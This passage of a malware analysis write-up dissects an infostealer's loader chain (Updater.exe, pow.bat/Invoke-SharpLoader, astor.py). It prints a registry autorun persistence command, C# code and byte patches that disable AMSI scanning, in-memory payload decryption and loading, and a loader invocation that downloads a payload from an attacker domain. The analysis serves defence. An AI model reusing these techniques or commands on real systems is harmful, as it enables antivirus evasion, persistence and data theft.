entire stealer logic executed from memory, with no persistent files written to disk. It left minimal telemetry traces beyond in-process memory artifacts and standard subprocess invocation. No attempt was made to establish persistence at this stage — the goal was quick, efficient, and silent data theft.",[806,7384,7385],{},"The use of legitimate APIs for exfiltration also made detection and prevention significantly harder, as outbound traffic blended in with routine internet activity.",[806,7387,7388,7389,7391],{},"This stage ultimately confirmed the malware’s identity: a variant of ",[1736,7390,6704],{},", known for its:",[2738,7393,7394,7397,7400,7403],{},[2741,7395,7396],{},"High modularity",[2741,7398,7399],{},"Runtime obfuscation",[2741,7401,7402],{},"Commercial distribution via Telegram",[2741,7404,7405],{},"Strong focus on credential harvesting and token-based session hijacking",[806,7407,7408,7409,7411],{},"Together with the earlier stages, ",[1524,7410,6643],{}," formed the critical endpoint of a stealthy and well-engineered infostealer chain. In the following sections, we dissect this component further and explain how we reversed its logic, mapped its infrastructure, and recovered every indicator of compromise used during its operation.",[1511,7413,7415,7416],{"id":7414},"_3-deep-dive-updaterexe","3. Deep Dive: ",[1524,7417,6635],{},[806,7419,816],{},[806,7421,7422,7424],{},[1524,7423,6635],{}," was the initial binary observed during post-compromise analysis. Despite its neutral appearance and negligible detection footprint, it played a critical role in maintaining the malware's operational persistence and delivering the next-stage payload.",[810,7426,7428],{"id":7427},"_31-properties","3.1 Properties",[806,7430,1536],{},[1902,7432,7433,7443],{},[1907,7434,7435],{},[1911,7436,7437,7440],{},[1915,7438,7439],{},"Property",[1915,7441,7442],{},"Value",[1923,7444,7445,7455,7465,7475,7485,7495],{},[1911,7446,7447,7452],{},[1928,7448,7449],{},[1736,7450,7451],{},"Format:",[1928,7453,7454],{},"Windows Portable Executable (PE32)",[1911,7456,7457,7462],{},[1928,7458,7459],{},[1736,7460,7461],{},"Architecture:",[1928,7463,7464],{},"x86-64",[1911,7466,7467,7472],{},[1928,7468,7469],{},[1736,7470,7471],{},"Size:",[1928,7473,7474],{},"~154 KB",[1911,7476,7477,7482],{},[1928,7478,7479],{},[1736,7480,7481],{},"Entropy:",[1928,7483,7484],{},"Normal (non-packed)",[1911,7486,7487,7492],{},[1928,7488,7489],{},[1736,7490,7491],{},"Signatures:",[1928,7493,7494],{},"None",[1911,7496,7497,7502],{},[1928,7498,7499],{},[1736,7500,7501],{},"VirusTotal Detection:",[1928,7503,7504],{},"1/69 at time of analysis",[806,7506,7507],{},"The file exhibited a clean import table and no embedded string indicators. No known packers, crypters, or runtime obfuscation mechanisms were detected. The structure was consistent with custom-compiled binaries.",[810,7509,7511],{"id":7510},"_32-behavioral-analysis","3.2 Behavioral Analysis",[806,7513,1536],{},[806,7515,7516],{},[1736,7517,7518],{},"No User Interaction Required",[806,7520,7521,7522,7524],{},"The malware chain executed without any required user interaction. Based on Defender’s process telemetry, the initial binary (",[1524,7523,6635],{},") was launched automatically — most likely via a persistence mechanism such as a registry autorun key. However, due to the age of the compromise and the absence of historical event logs, the exact method of persistence could not be recovered.",[806,7526,7527],{},[1736,7528,7529],{},"Silent Execution and Staging",[806,7531,7532,7533,7535,7536,7538],{},"Upon execution, ",[1524,7534,6635],{}," immediately launched ",[1524,7537,6639],{}," with no visual window and no user prompts. The staging occurred silently in the background. There was no evidence of user consent dialogs, UAC prompts, or GUI components.",[806,7540,7541],{},[1736,7542,7543],{},"Payload Deployment Behavior",[806,7545,7546,7548],{},[1524,7547,6639],{}," was found to be part of an Electron application structure, but the exact origin of its deployment remains unclear. One of the following is assumed:",[2738,7550,7551,7557],{},[2741,7552,7553,7554,7556],{},"The payload may have been bundled internally within ",[1524,7555,6635],{}," (e.g., embedded resource), or",[2741,7558,7559],{},"It may have been retrieved from a remote source",[806,7561,7562],{},"Due to a lack of network telemetry and no recovered hardcoded URL, the delivery vector for the Electron app remains inconclusive.",[806,7564,7565],{},[1736,7566,7567],{},"Process Chain Behavior",[806,7569,7570,7571,7573,7574,7576],{},"Once executed, ",[1524,7572,6635],{}," spawned ",[1524,7575,6639],{}," as a child process. The invocation was non-interactive, and no process spawned from the chain exhibited UI activity. The process chain continued as expected:",[1545,7578,7581],{"className":7579,"code":7580,"language":916},[1548],"Updater.exe → main.exe → cmd.exe → powershell (encoded) → python.exe astor.py\n",[1524,7582,7580],{"__ignoreMap":863},[806,7584,7585],{},"All execution stages operated without requiring user input, relying solely on pre-configured launch logic and silent execution paths. This minimized exposure and helped the malware remain undetected over an extended period.",[810,7587,7589],{"id":7588},"_33-role-in-the-infection-chain","3.3 Role in the Infection Chain",[806,7591,1536],{},[806,7593,7594,7596,7597,7600,7601,2786],{},[1524,7595,6635],{}," played a ",[1736,7598,7599],{},"single but essential role"," within the broader infection chain: it was responsible for the persistence and redeployment of the stage-2 component — ",[1524,7602,6639],{},[806,7604,7605],{},[1736,7606,7607],{},"Confirmed Characteristics",[2738,7609,7610,7617,7622],{},[2741,7611,7612,7613,7616],{},"It ",[1736,7614,7615],{},"did not"," contain or execute malicious logic directly",[2741,7618,7612,7619,7621],{},[1736,7620,7615],{}," perform any data exfiltration",[2741,7623,7612,7624,7626],{},[1736,7625,7615],{}," interact with browser credential stores or sensitive user data",[806,7628,7629,7630,7632],{},"Its sole purpose was to silently launch ",[1524,7631,6639],{}," during user login, using a registry autorun entry as the most likely method of persistence (though not directly recovered due to telemetry limitations).",[806,7634,7635,7636,7638,7639,7641],{},"By acting as an isolated first-stage loader, ",[1524,7637,6635],{}," ensured that the actual stealer payload (",[1524,7640,6643],{},") remained concealed in deeper layers of execution. This separation of duties allowed the attackers to:",[2738,7643,7644,7647,7650],{},[2741,7645,7646],{},"Avoid correlation by static AV or sandbox systems",[2741,7648,7649],{},"Swap or update payloads without modifying the loader",[2741,7651,7652],{},"Reduce behavioral signals at the entry point",[806,7654,7655,7656,7659],{},"This pattern is typical in ",[1736,7657,7658],{},"malware-as-a-service (MaaS)"," operations, where delivery mechanisms are generic and payloads are modular or client-specific.",[806,7661,7051,7662,7664],{},[1524,7663,6635],{}," provided just enough logic to serve as a reliable and stealthy entry point — nothing more, but also nothing less.",[810,7666,7668],{"id":7667},"_34-persistence-via-registry-confirmed-in-astorpy","3.4 Persistence via Registry (Confirmed in astor.py)",[806,7670,1536],{},[806,7672,7673,7674,7676],{},"Static analysis of the Python payload revealed that ",[1524,7675,6635],{}," is explicitly persisted using a registry autorun entry:",[2738,7678,7679,7687,7695],{},[2741,7680,7681,2545,7684],{},[1736,7682,7683],{},"Registry Path",[1524,7685,7686],{},"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",[2741,7688,7689,2545,7692],{},[1736,7690,7691],{},"Value Name",[1524,7693,7694],{},"Realtek Audio",[2741,7696,7697,2545,7700],{},[1736,7698,7699],{},"Payload Path",[1524,7701,7702],{},"%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\Updater.exe",[806,7704,7705],{},"The corresponding registry command is executed via PowerShell:",[1545,7707,7711],{"className":7708,"code":7709,"language":7710,"meta":863,"style":863},"language-powershell shiki shiki-themes github-light github-dark","reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Realtek Audio\" /t REG_SZ /d \"...\\Updater.exe\" /f\n","powershell",[1524,7712,7713],{"__ignoreMap":863},[1588,7714,7715],{"class":1590,"line":1591},[1588,7716,7709],{},[806,7718,7719],{},"This ensures the malware is launched at every user login. The file is also marked with hidden and system attributes to further evade detection:",[1545,7721,7723],{"className":7708,"code":7722,"language":7710,"meta":863,"style":863},"attrib +h +s \"Updater.exe\"\n",[1524,7724,7725],{"__ignoreMap":863},[1588,7726,7727],{"class":1590,"line":1591},[1588,7728,7722],{},[806,7730,7731],{},"This persistence mechanism was embedded directly into the astor.py code, confirming that the final-stage stealer actively maintains loader presence on disk and in the startup registry.",[810,7733,7735],{"id":7734},"_35-summary","3.5 Summary",[806,7737,1536],{},[3587,7739,7740],{},[806,7741,7742,7743,7745],{},"While ",[1524,7744,6635],{}," was not inherently malicious in structure or content, its contextual behavior within the execution chain confirmed its role as a malware loader.",[1541,7747],{"className":7748},[6875],[806,7750,7751],{},"This binary served as a clean, minimalistic first-stage launcher — avoiding detection by static analysis, AV engines, and behavioral rules. Its design focused purely on stealth and operational support, not on executing malicious logic itself.",[806,7753,7754,7755,7757,7758,7760,7761,7764],{},"However, its role extended beyond initial deployment. During reverse engineering of the ",[1524,7756,6643],{}," payload, we identified logic that actively checked for the presence of ",[1524,7759,6635],{},". This check was part of a broader ",[1736,7762,7763],{},"health and self-healing cycle"," implemented within the stealer code — a mechanism designed to verify the integrity of the infection chain and restore missing components if needed.",[806,7766,7767,7768,7770,7771,7774],{},"This means that ",[1524,7769,6635],{}," was not only responsible for initiating the malware, but also formed part of its ",[1736,7772,7773],{},"ongoing runtime validation",". Without this stub, the malware could lose its ability to reinitialize in future sessions.",[806,7776,7777],{},[1736,7778,7779,7780,3034],{},"Key Functions of ",[1524,7781,6635],{},[2738,7783,7784,7789,7794,7797],{},[2741,7785,7786,7787],{},"Seamless deployment of ",[1524,7788,6639],{},[2741,7790,7791,7792],{},"Indirect execution of ",[1524,7793,6643],{},[2741,7795,7796],{},"Decoupling of loader and payload logic",[2741,7798,7799,7802],{},[1736,7800,7801],{},"Referenced by the payload itself"," as part of operational health monitoring",[806,7804,7805],{},"In Section 5, we will detail the internal health-check routines of the stealer, including its self-healing behavior and integrity validation mechanisms.",[806,7807,7808,7809,7811],{},"For now, it is clear that ",[1524,7810,6635],{}," served as both ignition and anchor point in this layered infostealer architecture.",[810,7813,7815],{"id":7814},"_36-extraction-trick-outsmarting-the-loader","3.6 Extraction Trick: Outsmarting the Loader",[806,7817,1536],{},[806,7819,7820],{},"Sometimes, the best reverse engineering results don’t come from deep binary disassembly — but from a bit of trickery and patience.",[806,7822,7823,7824,7826,7827,7829],{},"While analyzing the infection in a controlled lab environment, we noticed something odd: ",[1524,7825,6635],{}," was present and executing, but ",[1524,7828,6639],{}," had vanished from the file system. That’s when we had an idea — what happens if we let the malware repair itself?",[806,7831,7832,7833,7838,7839,7841],{},"We deliberately ",[1736,7834,7835,7836],{},"deleted ",[1524,7837,6639],{}," from the infected environment while leaving ",[1524,7840,6635],{}," untouched. And sure enough, after the next user session login, the loader sprang into action — not with a tantrum, but with a quiet attempt to rebuild its second stage.",[806,7843,7844,7845,2289,7847,7849,7850,7853,7854,7857,7858,2289,7860,7863,7864,7866],{},"Here’s where it got interesting: Instead of directly recreating ",[1524,7846,6639],{},[1524,7848,6635],{}," first dropped a file named ",[1524,7851,7852],{},"app-64.7z"," — a standard ",[1736,7855,7856],{},"7-Zip archive",". This archive contained the full Electron application structure, including ",[1524,7859,6639],{},[1524,7861,7862],{},"resources",", and the ",[1524,7865,7089],{}," payload with all embedded logic.",[806,7868,7869,7870,2786],{},"We had effectively ",[1736,7871,7872],{},"forced the malware to hand us the source package",[806,7874,7875],{},[1449,7876],{"alt":7877,"src":7878},"Suspicious Updater Executable Detected","https://res.cloudinary.com/c4a8/image/upload/v1749797290/blog/pics/updater-exe.png",[806,7880,7881],{},"With this 7z archive in hand, we were able to extract, decompress, and fully reverse the JavaScript-based orchestration logic without even touching the original loader again. The archive structure matched the expected Electron app layout perfectly.",[806,7883,7884,7885,7888],{},"This behavior strongly suggests that the attackers deliberately chose a ",[1736,7886,7887],{},"modular and maintainable architecture",", using archives as flexible payload containers. It also allowed them to swap or update payload components without recompiling the loader binary.",[806,7890,7891],{},"And in our case? It allowed us to outsmart their chain, intercept the drop, and walk away with the full package — like stealing the blueprints off the workbench while the builder wasn’t looking.",[806,7893,7894,7895],{},"Let’s just say: ",[1736,7896,7897,7898,2289,7901,7904],{},"sometimes the best forensic tools are ",[1524,7899,7900],{},"del",[1524,7902,7903],{},"wait",", and a little curiosity.",[1511,7906,7908,7909],{"id":7907},"_4-deep-dive-powbat","4. Deep Dive: ",[1524,7910,7911],{},"pow.bat",[806,7913,816],{},[806,7915,7916,7917,7920],{},"In the analyzed malware campaign, the component ",[1524,7918,7919],{},"Invoke-SharpLoader"," acts as a custom, memory-resident .NET loader that exhibits a highly modular and evasive execution flow. This section dissects its internal architecture, its anti-analysis strategy via AMSI patching, and its role in facilitating the second stage payload.",[810,7922,7924],{"id":7923},"_41-binary-properties-sharploader-batch-wrapper","4.1 Binary Properties – SharpLoader Batch Wrapper",[806,7926,1536],{},[806,7928,7929,7930,7932],{},"Before being executed to load the .NET payload in memory, the outer wrapper ",[1524,7931,7911],{}," shows the following characteristics based on static analysis:",[1902,7934,7935,7943],{},[1907,7936,7937],{},[1911,7938,7939,7941],{},[1915,7940,7439],{},[1915,7942,7442],{},[1923,7944,7945,7954,7963,7973,7982,7992,8002,8011],{},[1911,7946,7947,7951],{},[1928,7948,7949],{},[1736,7950,7451],{},[1928,7952,7953],{},"DOS Batch File",[1911,7955,7956,7960],{},[1928,7957,7958],{},[1736,7959,7461],{},[1928,7961,7962],{},"Script-based (not compiled binary)",[1911,7964,7965,7970],{},[1928,7966,7967],{},[1736,7968,7969],{},"File Size:",[1928,7971,7972],{},"27.79 KB (28454 bytes)",[1911,7974,7975,7979],{},[1928,7976,7977],{},[1736,7978,7481],{},[1928,7980,7981],{},"Normal (plain ASCII text)",[1911,7983,7984,7989],{},[1928,7985,7986],{},[1736,7987,7988],{},"Magic:",[1928,7990,7991],{},"DOS batch file, ASCII text",[1911,7993,7994,7999],{},[1928,7995,7996],{},[1736,7997,7998],{},"Digital Signature:",[1928,8000,8001],{},"None detected",[1911,8003,8004,8008],{},[1928,8005,8006],{},[1736,8007,7501],{},[1928,8009,8010],{},"26 / 61 (at time of analysis)",[1911,8012,8013,8018],{},[1928,8014,8015],{},[1736,8016,8017],{},"Threat Labels:",[1928,8019,8020,2289,8023,2289,8026,2289,8028],{},[1524,8021,8022],{},"trojan",[1524,8024,8025],{},"downloader",[1524,8027,7710],{},[1524,8029,8030],{},"agentb",[806,8032,8033,8034,8037],{},"Despite being a simple ",[1524,8035,8036],{},".bat"," file, the script evades many static detections and relies heavily on living-off-the-land techniques such as PowerShell to download and execute obfuscated and encrypted payloads.",[810,8039,8041,8042,2772],{"id":8040},"_42-amsi-bypass-technique-class-gofor4msi","4.2 AMSI Bypass Technique (Class: ",[1524,8043,8044],{},"gofor4msi",[806,8046,1536],{},[806,8048,8049],{},"One of the first defensive mechanisms bypassed by SharpLoader is AMSI — the Anti-Malware Scan Interface — a Microsoft feature integrated into scripting engines like PowerShell and Windows Script Host to provide real-time content scanning for suspicious behavior. Malware authors often attempt to bypass AMSI to avoid detection by endpoint protection systems.",[806,8051,8052,8053,8056,8057,8060,8061,8064,8065,8068,8069,8072],{},"In SharpLoader, the AMSI bypass is implemented through ",[1736,8054,8055],{},"direct in-memory patching"," of the ",[1524,8058,8059],{},"AmsiScanBuffer"," function within the ",[1524,8062,8063],{},"amsi.dll",". This function is normally responsible for analyzing script content and returning a result code indicating whether the content is suspicious (",[1524,8066,8067],{},"AMSI_RESULT_DETECTED",") or safe (",[1524,8070,8071],{},"AMSI_RESULT_CLEAN",").",[806,8074,8075],{},"The relevant in-memory patching code is:",[1545,8077,8081],{"className":8078,"code":8079,"language":8080,"meta":863,"style":863},"language-csharp shiki shiki-themes github-light github-dark","var lib = Win32.LoadLibrary(\"amsi.dll\");\nvar addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\nWin32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\nMarshal.Copy(patch, 0, addr, patch.Length);\n","csharp",[1524,8082,8083,8088,8093,8098],{"__ignoreMap":863},[1588,8084,8085],{"class":1590,"line":1591},[1588,8086,8087],{},"var lib = Win32.LoadLibrary(\"amsi.dll\");\n",[1588,8089,8090],{"class":1590,"line":864},[1588,8091,8092],{},"var addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\n",[1588,8094,8095],{"class":1590,"line":1814},[1588,8096,8097],{},"Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\n",[1588,8099,8100],{"class":1590,"line":1831},[1588,8101,8102],{},"Marshal.Copy(patch, 0, addr, patch.Length);\n",[806,8104,8105],{},"This sequence performs the following steps:",[4351,8107,8108,8117,8128,8138],{},[2741,8109,8110,8113,8114,2786],{},[1736,8111,8112],{},"Load the AMSI DLL"," into the process using ",[1524,8115,8116],{},"LoadLibrary(\"amsi.dll\")",[2741,8118,8119,8122,8123,6644,8125,2786],{},[1736,8120,8121],{},"Resolve the memory address"," of the function ",[1524,8124,8059],{},[1524,8126,8127],{},"GetProcAddress()",[2741,8129,8130,8133,8134,8137],{},[1736,8131,8132],{},"Change the memory protection"," of the address using ",[1524,8135,8136],{},"VirtualProtect()"," to make it writable.",[2741,8139,8140,8143,8144,8147],{},[1736,8141,8142],{},"Overwrite the beginning of the function"," using ",[1524,8145,8146],{},"Marshal.Copy()"," with a small shellcode patch.",[806,8149,8150],{},"The patch applied for 64-bit systems is:",[1545,8152,8154],{"className":8078,"code":8153,"language":8080,"meta":863,"style":863},"static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; // mov eax, 0x80070057; ret\n",[1524,8155,8156],{"__ignoreMap":863},[1588,8157,8158],{"class":1590,"line":1591},[1588,8159,8153],{},[806,8161,8162],{},"This corresponds to the following instructions:",[2738,8164,8165,8174],{},[2741,8166,8167,8170,8171],{},[1524,8168,8169],{},"mov eax, 0x80070057"," → sets the return code to the Windows error code ",[1524,8172,8173],{},"E_INVALIDARG",[2741,8175,8176,8179],{},[1524,8177,8178],{},"ret"," → immediately returns from the function",[806,8181,8182,8183,8185],{},"This effectively causes ",[1524,8184,8059],{}," to fail silently and return a non-detection result, neutralizing AMSI checks. The malware can now execute scripts or .NET code that would otherwise trigger antivirus alerts.",[806,8187,8188],{},"If executed on a 32-bit system, a different patch is applied:",[1545,8190,8192],{"className":8078,"code":8191,"language":8080,"meta":863,"style":863},"static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }; // mov eax, ...; ret 0x18\n",[1524,8193,8194],{"__ignoreMap":863},[1588,8195,8196],{"class":1590,"line":1591},[1588,8197,8191],{},[806,8199,8200],{},"This reflects the same goal — forcing a \"clean\" result — but adapted to the x86 calling convention.",[806,8202,8203,8204,2289,8207,8210,8211,8214],{},"Using raw P/Invoke calls like ",[1524,8205,8206],{},"LoadLibrary",[1524,8208,8209],{},"GetProcAddress",", and ",[1524,8212,8213],{},"VirtualProtect"," allows this patching to be done dynamically and without invoking any high-level APIs that might be monitored by EDR tools. This method is compact, effective, and leaves minimal forensic artifacts.",[806,8216,8217,8218,8221],{},"In summary, this AMSI bypass technique is a ",[1736,8219,8220],{},"low-level, direct memory attack on the antivirus interface",", carried out in milliseconds during runtime. It's a powerful example of why behavioral monitoring and memory inspection are essential in modern endpoint defense systems.",[810,8223,8225],{"id":8224},"_43-stage-2-payload-handling","4.3 Stage 2 Payload Handling",[806,8227,1536],{},[806,8229,8230,8231,8234],{},"After the AMSI bypass is complete, the loader proceeds to retrieve and prepare the second-stage payload. This payload is not embedded in the loader itself but is fetched either from a remote server or read from disk — depending on how the loader is invoked via the ",[1524,8232,8233],{},"$location"," parameter.",[806,8236,8237,8238,8241,8242,8245,8246,8249,8250,8253,8254,8257],{},"If the location begins with ",[1524,8239,8240],{},"http",", it is interpreted as a URL and the loader uses ",[1524,8243,8244],{},"Get_Stage2()"," to download the payload via ",[1524,8247,8248],{},"HttpWebRequest",". If it is a local path, ",[1524,8251,8252],{},"Get_Stage2disk()"," reads the contents directly from the file system. In both cases, the expected file content is a ",[1736,8255,8256],{},"Base64-encoded, GZip-compressed, and AES-encrypted"," blob.",[806,8259,8260,8261,8264],{},"The loader then performs a ",[1736,8262,8263],{},"four-stage decoding and decryption pipeline"," entirely in memory:",[4351,8266,8267,8273,8283,8293],{},[2741,8268,8269,8272],{},[1736,8270,8271],{},"Base64 Decoding",": Converts the encoded string into raw bytes. This step is designed to obscure the actual binary content from static inspection tools and prevents straightforward pattern matching.",[2741,8274,8275,8278,8279,8282],{},[1736,8276,8277],{},"GZip Decompression",": The decoded bytes are passed to a ",[1524,8280,8281],{},"GZipStream",", which decompresses the payload. Compression reduces file size and adds another layer of obfuscation.",[2741,8284,8285,8288,8289,8292],{},[1736,8286,8287],{},"AES Decryption",": The compressed bytes are decrypted using AES (Rijndael) in CBC mode. The key is derived at runtime from the user-provided password using SHA-256 hashing combined with PBKDF2 (",[1524,8290,8291],{},"Rfc2898DeriveBytes",") and a static salt.",[2741,8294,8295,8298],{},[1736,8296,8297],{},"Salt Removal",": The decrypted result still contains a fixed-length salt prefix (4 bytes). These bytes are removed manually to obtain the clean binary blob that represents a valid .NET assembly.",[806,8300,8301],{},"The decryption pipeline is executed like so:",[1545,8303,8305],{"className":8078,"code":8304,"language":8080,"meta":863,"style":863},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\nbyte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[1524,8306,8307,8312],{"__ignoreMap":863},[1588,8308,8309],{"class":1590,"line":1591},[1588,8310,8311],{},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\n",[1588,8313,8314],{"class":1590,"line":864},[1588,8315,8316],{},"byte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[806,8318,8319,8320,8323],{},"Here, ",[1524,8321,8322],{},"AES_Decrypt()"," is a custom function that wraps the Rijndael algorithm, configured with a 256-bit key and a 128-bit IV (initialization vector), both derived from the password.",[806,8325,8326],{},[1736,8327,8328],{},"Key Design Observations:",[2738,8330,8331,8334,8337],{},[2741,8332,8333],{},"The use of AES-CBC with PBKDF2 makes brute-forcing the password non-trivial.",[2741,8335,8336],{},"Since decryption happens in memory, no intermediate results are ever written to disk — reducing forensic artifacts.",[2741,8338,8339],{},"If the wrong password is supplied, decryption silently fails or produces invalid data, which may lead to failed execution or hard-to-trace exceptions.",[806,8341,8342],{},"In summary, this multi-stage payload handling approach significantly raises the bar for both signature- and heuristic-based static detection. Without either live execution or deep inspection of the loader behavior, defenders are unlikely to uncover the embedded payload without also knowing the password and exact decoding logic.",[810,8344,8346],{"id":8345},"_44-dynamic-assembly-loading","4.4 Dynamic Assembly Loading",[806,8348,1536],{},[806,8350,8351],{},"Once the second-stage payload has been successfully decrypted, the resulting byte array represents a valid .NET assembly. Instead of writing this assembly to disk — a common indicator for antivirus or EDR systems — SharpLoader executes it directly in memory using reflection:",[1545,8353,8355],{"className":8078,"code":8354,"language":8080,"meta":863,"style":863},"Assembly a = Assembly.Load(bin);\na.EntryPoint.Invoke(null, new object[] { commands });\n",[1524,8356,8357,8362],{"__ignoreMap":863},[1588,8358,8359],{"class":1590,"line":1591},[1588,8360,8361],{},"Assembly a = Assembly.Load(bin);\n",[1588,8363,8364],{"class":1590,"line":864},[1588,8365,8366],{},"a.EntryPoint.Invoke(null, new object[] { commands });\n",[806,8368,8369,8370,8373],{},"This technique is referred to as ",[1736,8371,8372],{},"fileless execution",". It is highly evasive because it:",[2738,8375,8376,8379,8382],{},[2741,8377,8378],{},"Avoids touching the disk, leaving no file-based IOCs (indicators of compromise)",[2741,8380,8381],{},"Makes traditional forensic acquisition harder, as no binary is saved on disk",[2741,8383,8384],{},"Evades static signature-based detection, since AV engines often rely on scanning files",[806,8386,8387,8388,8391,8392,8395],{},"If the ",[1524,8389,8390],{},"EntryPoint"," is not ",[1524,8393,8394],{},"static",", the loader includes a fallback logic:",[1545,8397,8399],{"className":8078,"code":8398,"language":8080,"meta":863,"style":863},"MethodInfo method = a.EntryPoint;\nif (method != null)\n{\n object o = a.CreateInstance(method.Name);\n method.Invoke(o, null);\n}\n",[1524,8400,8401,8406,8411,8416,8421,8426],{"__ignoreMap":863},[1588,8402,8403],{"class":1590,"line":1591},[1588,8404,8405],{},"MethodInfo method = a.EntryPoint;\n",[1588,8407,8408],{"class":1590,"line":864},[1588,8409,8410],{},"if (method != null)\n",[1588,8412,8413],{"class":1590,"line":1814},[1588,8414,8415],{},"{\n",[1588,8417,8418],{"class":1590,"line":1831},[1588,8419,8420],{}," object o = a.CreateInstance(method.Name);\n",[1588,8422,8423],{"class":1590,"line":2135},[1588,8424,8425],{}," method.Invoke(o, null);\n",[1588,8427,8428],{"class":1590,"line":2141},[1588,8429,8430],{},"}\n",[806,8432,8433,8434,8437],{},"This ensures compatibility with assemblies that require an instantiated object for execution (e.g., ",[1524,8435,8436],{},"public int Main()"," inside a class instance). The code dynamically creates an instance of the class and then calls the entry point method.",[806,8439,8440],{},"Combined with the AMSI bypass and in-memory decryption, this mechanism delivers the final payload to execution in a stealthy, fully fileless manner — a hallmark of modern, evasive malware.",[810,8442,8444],{"id":8443},"_45-command-line-parameters-and-flexibility","4.5 Command Line Parameters and Flexibility",[806,8446,1536],{},[806,8448,8449,8450,8452],{},"The PowerShell function ",[1524,8451,7919],{}," is designed to act as a flexible wrapper for arbitrary .NET payloads. It supports dynamic input of both the payload location and arguments, allowing a single loader instance to be reused across multiple operations or campaigns.",[806,8454,8455],{},[1736,8456,8457],{},"Supported Parameters:",[2738,8459,8460,8466,8472,8492],{},[2741,8461,8462,8465],{},[1524,8463,8464],{},"-location"," (mandatory): Specifies either a URL or a local file path to the stage two encrypted payload.",[2741,8467,8468,8471],{},[1524,8469,8470],{},"-password"," (mandatory): Used to derive the AES decryption key.",[2741,8473,8474,2289,8477,2289,8480,8483,8484,8487,8488,8491],{},[1524,8475,8476],{},"-argument",[1524,8478,8479],{},"-argument2",[1524,8481,8482],{},"-argument3"," (optional): These are forwarded directly to the ",[1524,8485,8486],{},".NET"," assembly’s ",[1524,8489,8490],{},"Main()"," method via reflection.",[2741,8493,8494,8497],{},[1524,8495,8496],{},"-noArgs",": Triggers execution without passing any parameters to the second-stage payload.",[806,8499,8500],{},"Internally, the arguments are collected and forwarded like this:",[1545,8502,8504],{"className":7708,"code":8503,"language":7710,"meta":863,"style":863},"object[] cmd = args.Skip(2).ToArray();\na.EntryPoint.Invoke(null, new object[] { cmd });\n",[1524,8505,8506,8511],{"__ignoreMap":863},[1588,8507,8508],{"class":1590,"line":1591},[1588,8509,8510],{},"object[] cmd = args.Skip(2).ToArray();\n",[1588,8512,8513],{"class":1590,"line":864},[1588,8514,8515],{},"a.EntryPoint.Invoke(null, new object[] { cmd });\n",[806,8517,8518],{},"This means that the .NET payload is expected to have a signature like:",[1545,8520,8522],{"className":8078,"code":8521,"language":8080,"meta":863,"style":863},"static void Main(string[] args)\n",[1524,8523,8524],{"__ignoreMap":863},[1588,8525,8526],{"class":1590,"line":1591},[1588,8527,8521],{},[806,8529,8530,8531,8533],{},"or it will gracefully fall back to the parameterless ",[1524,8532,8490],{}," variant via fallback logic. This behavior allows red teams or malware authors to create multi-purpose second stages that can perform different operations depending on the input — for example, launching an implant, collecting system info, or initiating C2 communication.",[806,8535,8536],{},"Such modularity and configurability are key features of advanced malware frameworks, and they illustrate how script-based loaders can behave as highly adaptive execution environments for downstream payloads.",[810,8538,8540],{"id":8539},"_46-real-world-usage-example","4.6 Real-World Usage Example",[806,8542,1536],{},[806,8544,8545],{},"To illustrate SharpLoader’s real-world execution in an actual campaign, consider the following invocation seen in the wild:",[1545,8547,8549],{"className":7708,"code":8548,"language":7710,"meta":863,"style":863},"Invoke-SharpLoader -location \"https://cosmoplwnets.xyz/.well-known/pki-validation/calc.enc\" -password UwUFufu1 -noArgs\n",[1524,8550,8551],{"__ignoreMap":863},[1588,8552,8553],{"class":1590,"line":1591},[1588,8554,8548],{},[806,8556,8557],{},"This example highlights the typical use case of SharpLoader:",[2738,8559,8560,8574,8586,8596],{},[2741,8561,8562,8565,8566,8569,8570,8573],{},[1736,8563,8564],{},"Location Argument",": The URL points to a remote server hosting ",[1524,8567,8568],{},"calc.enc",", a concealed second-stage payload. The endpoint is located under a legitimate-looking ",[1524,8571,8572],{},".well-known"," directory, often used for HTTPS certificate validation, which helps blend the URL into legitimate web traffic.",[2741,8575,8576,2545,8579,8581,8582,8585],{},[1736,8577,8578],{},"Payload Characteristics",[1524,8580,8568],{}," is a ",[1736,8583,8584],{},"triple-obfuscated file"," — Base64-encoded, GZip-compressed, and AES-encrypted. This obfuscation pipeline ensures the payload is opaque to most detection mechanisms unless fully executed and decrypted in memory.",[2741,8587,8588,8591,8592,8595],{},[1736,8589,8590],{},"Password Argument",": The string ",[1524,8593,8594],{},"UwUFufu1"," is used at runtime to derive the AES key via SHA-256 and PBKDF2. Without this password, the payload cannot be decrypted, making offline analysis without context nearly impossible.",[2741,8597,8598,8601,8602,8604],{},[1736,8599,8600],{},"No Additional Arguments",": The ",[1524,8603,8496],{}," switch indicates that no command-line parameters are passed to the decrypted .NET assembly, triggering its default execution path.",[806,8606,8607,8608,8611],{},"This stealthy invocation chain encapsulates SharpLoader’s core purpose: ",[1736,8609,8610],{},"fileless, adaptive, and secure payload delivery"," through simple PowerShell syntax with maximum obfuscation and evasion.",[810,8613,8615],{"id":8614},"_47-summary","4.7 Summary",[806,8617,1536],{},[806,8619,8620,8621,8623],{},"The ",[1524,8622,7919],{}," construct exemplifies a highly refined and evasive malware staging technique that leverages native system components, reflection, and cryptography to operate almost entirely in-memory.",[806,8625,8626],{},[1736,8627,8628],{},"Key Highlights:",[2738,8630,8631,8640,8646,8652],{},[2741,8632,8633,8636,8637,8639],{},[1736,8634,8635],{},"Bypassing AMSI",": Direct in-memory patching of ",[1524,8638,8059],{}," disables antivirus inspection without invoking detectable APIs.",[2741,8641,8642,8645],{},[1736,8643,8644],{},"Secure Payload Handling",": Retrieval of encrypted and compressed stage-two payloads ensures confidentiality and adds multiple layers of evasion.",[2741,8647,8648,8651],{},[1736,8649,8650],{},"Memory-Only Execution",": 